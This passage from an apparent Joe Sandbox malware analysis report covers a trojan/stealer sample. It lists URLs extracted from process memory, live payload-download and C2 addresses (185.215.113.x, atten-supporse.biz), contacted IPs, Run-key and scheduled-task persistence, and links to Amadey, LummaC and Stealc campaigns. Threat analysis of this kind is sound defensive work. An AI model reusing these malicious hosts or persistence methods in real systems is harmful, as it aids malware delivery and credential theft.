http://mozilla.org/#/properties/branches/anyOf/1	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/branches/anyOf/0	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/referenceBranch	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/bucketConfig/properties/counthttp://mozilla.org/#/properties/branche	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/branches/anyOf/2	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/quickSuggestNonSponsoredIndexhttp://mozilla.org/#/properties/quickSu	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exez$	c92938c010.exe, 00000010.00000002.2948754234.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://mozilla.org/#/properties/outcomes/items	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/quickSuggestSponsoredIndex	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com/userDISCOVERY_STREAM_CONFIG_CHANGE	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	c92938c010.exe, 00000010.00000003.2606708211.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2866287245.0000019CF8BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	c92938c010.exe, 00000010.00000003.2553366123.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2553274997.0000000005D49000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bugzilla.mo	firefox.exe, 00000022.00000002.2893030248.0000019CFD8A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2897927668.0000019CFDD2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA22D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://woo097878781.win	powershell.exe, 0000000E.00000002.2582645797.0000028D0C911000.00000004.00000800.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://atten-supporse.biz/F8l	c92938c010.exe, 00000010.00000003.2628506892.0000000005D0A000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2628559063.0000000005D0B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/off/def.exe	c92938c010.exe, 00000010.00000002.2943562507.00000000012FB000.00000004.00000010.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000002.2948754234.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com/	firefox.exe, 00000022.00000002.2866895836.0000019CF8C9F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2895818368.0000019CFDB7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF96B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2803693593.0000019D0588D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2927658878.0000019D05885000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2930962305.0000019D06F62000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/	c92938c010.exe, 00000010.00000003.2628559063.0000000005D0B000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2579955491.0000000005D0F000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2603779903.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2604776557.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000013.00000002.2698914818.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecop	2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/msvcp140.dllL	2bd330404c.exe, 00000011.00000002.2948007674.0000000001144000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/endDate	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/addonsFeatureGate	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/addonsShowLessFrequentlyCap	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=1584464	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2898252938.0000019CFDE96000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/proposedDurationawesome-bar-result-menu-rollout-phase-1http://mozill	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpe	2bd330404c.exe, 00000011.00000002.2936414035.0000000000277000.00000040.00000001.01000000.0000000E.sdmp	false		high
http://mozilla.org/#/properties/featureIds/itemshttp://mozilla.org/#/properties/startDate	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/nss3.dllll	2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://json-schema.org/draft-07/schema#showUpdateAvailableNotification/	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exeu	skotes.exe, 00000006.00000002.2954528432.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnithttp://mozilla.org/#/proper	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/enrollmentEndDate	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2920221170.0000019D00816000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2918649954.0000019CFFE6B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	c92938c010.exe, 00000010.00000003.2604610604.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2913522204.0000019CFF5CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2922378340.0000019D00CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893030248.0000019CFD830000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	c92938c010.exe, 00000010.00000003.2604610604.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2913522204.0000019CFF5CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2922378340.0000019D00CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893030248.0000019CFD830000.00000004.00000800.00020000.00000000.sdmp	false		high
https://infra.spec.whatwg.org/#ascii-whitespace	firefox.exe, 00000022.00000002.2904457725.0000019CFE803000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored	firefox.exe, 00000022.00000002.2866895836.0000019CF8CA7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/mozglue.dllDataUser	2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	false	Avira URL Cloud: malware	unknown
http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/outcomes	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/?t=ffab&q=	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA240000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	c92938c010.exe, 00000010.00000003.2605720937.0000000006026000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dllvbnData	2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	false	Avira URL Cloud: malware	unknown
https://mail.yahoo.co.jp/compose/?To=%s	firefox.exe, 00000022.00000002.2876452576.0000019CFABBC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2868138373.0000019CF917D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2711012212.0000019CFB02C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2711421911.0000019CFB033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2879851015.0000019CFB033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.php/-	2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile.services.mozilla.com/v1/tiles	firefox.exe, 00000022.00000003.2838238033.0000019D05A5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2881255814.0000019CFB200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.2895818368.0000019CFDB67000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.co.uk/	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2815333733.0000019CFE569000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2898252938.0000019CFDEDF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://screenshots.firefox.com/	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707461103.0000019CFD13E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA240000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707211364.0000019CFD120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707697289.0000019CFD15D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2708005438.0000019CFD17B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://merino.services.mozilla.com/api/v1/suggestresource://gre/modules/translation/LanguageDetecto	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
https://firefox-source-docs.mozilla.org/remote/Security.html	firefox.exe, 00000022.00000002.2870074343.0000019CF963C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
https://getpocket.com/recommendationsDisplays	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://json-schema.org/draft-07/schema#-	firefox.exe, 00000022.00000002.2906486113.0000019CFEAD7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpser	2bd330404c.exe, 00000011.00000002.2936414035.0000000000277000.00000040.00000001.01000000.0000000E.sdmp	false		high
http://185.215.113.16/steam/random.exe-	skotes.exe, 00000006.00000002.2954528432.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/apiZwQdx	c92938c010.exe, 00000010.00000003.2660676123.00000000015F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/mozilla/webcompat-reporterhandleTopSitesSponsoredImpressionStats	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/	2bd330404c.exe, 00000011.00000002.2936414035.0000000000194000.00000040.00000001.01000000.0000000E.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/google/closure-compiler/issues/3177	firefox.exe, 00000022.00000002.2904457725.0000019CFE803000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialog	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/#/properties/appId	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/complete/	firefox.exe, 00000022.00000003.2838640090.0000019D05A27000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/nss3.dlldll	2bd330404c.exe, 00000011.00000002.2936414035.00000000001C5000.00000040.00000001.01000000.0000000E.sdmp	false	Avira URL Cloud: malware	unknown
http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariationresource://gre/modules/componen	firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
154.216.20.243	woo097878781.win	Seychelles	135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	true
34.107.221.82	prod.detectportal.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
35.244.181.201	prod.balrog.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
34.117.188.166	prod.ads.prod.webservices.mozgcp.net	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
104.21.16.9	atten-supporse.biz	United States	13335	CLOUDFLARENETUS	false
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false
185.157.162.216	unknown	Sweden	197595	OBE-EUROPEObenetworkEuropeSE	true
142.250.181.78	youtube.com	United States	15169	GOOGLEUS	false
34.160.144.191	prod.content-signature-chains.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1571262
Start date and time:	2024-12-09 08:06:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	51
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@78/58@24/14
EGA Information:	Successful, ratio: 85.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 2.23.194.22
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, detectportal.prod.mozaws.net, aus5.mozilla.org, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, location.services.mozilla.com
Execution Graph export aborted for target powershell.exe, PID 2188 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:08:01	API Interceptor	22198x Sleep call for process: skotes.exe modified
02:08:11	API Interceptor	94x Sleep call for process: powershell.exe modified
02:08:21	API Interceptor	75x Sleep call for process: c92938c010.exe modified
02:08:39	API Interceptor	2x Sleep call for process: svchost.exe modified
02:08:44	API Interceptor	172x Sleep call for process: 2bd330404c.exe modified
02:09:01	API Interceptor	1x Sleep call for process: explorer.exe modified
07:06:57	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
07:08:25	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run c92938c010.exe C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe
07:08:33	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2bd330404c.exe C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe
07:08:42	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run b5c7128cd0.exe C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe
07:08:46	Task Scheduler	Run new task: WindowsSystem path: "C:\ProgramData\WindowsSystem\WindowsSystem.exe" s>{34E50511-FBB8-42F8-98A2-2629192A03A0}
07:08:50	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run c92938c010.exe C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe
07:08:58	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2bd330404c.exe C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe
07:09:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run b5c7128cd0.exe C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe
07:09:20	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 6dce78ba2b.exe C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
185.215.113.16	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/off/random.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
atten-supporse.biz	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	DXzJ8Bi7WC.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	cd94pB4Z9p.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	AmNdY4tRXD.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
example.org	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
ipv4only.arpa	file.exe	Get hash	malicious	Credential Flusher	Browse	192.0.0.170
	file.exe	Get hash	malicious	Credential Flusher	Browse	192.0.0.171
	file.exe	Get hash	malicious	Credential Flusher	Browse	192.0.0.170
	file.exe	Get hash	malicious	Credential Flusher	Browse	192.0.0.170
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	192.0.0.171
	file.exe	Get hash	malicious	Credential Flusher	Browse	192.0.0.170
	file.exe	Get hash	malicious	Credential Flusher	Browse	192.0.0.170
	file.exe	Get hash	malicious	Credential Flusher	Browse	192.0.0.171
	file.exe	Get hash	malicious	Credential Flusher	Browse	192.0.0.170
	file.exe	Get hash	malicious	Credential Flusher	Browse	192.0.0.170

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SKHT-ASShenzhenKatherineHengTechnologyInformationCo	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse	154.216.20.243
	file.exe	Get hash	malicious	Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar	Browse	154.216.20.243
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse	154.216.20.243
	nshkmpsl.elf	Get hash	malicious	Mirai	Browse	156.241.11.63
	nshkmips.elf	Get hash	malicious	Mirai	Browse	156.241.11.38
	https://share.hsforms.com/1btg1UbajRd2Ui8qqobJYrAssgaj	Get hash	malicious	HTMLPhisher	Browse	154.216.20.36
	na.elf	Get hash	malicious	Gafgyt	Browse	154.216.18.82
	mipsel.elf	Get hash	malicious	Gafgyt	Browse	154.216.18.82
	powerpc.elf	Get hash	malicious	Gafgyt	Browse	154.216.18.82
	i686.elf	Get hash	malicious	Mirai, Gafgyt	Browse	154.216.18.82
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
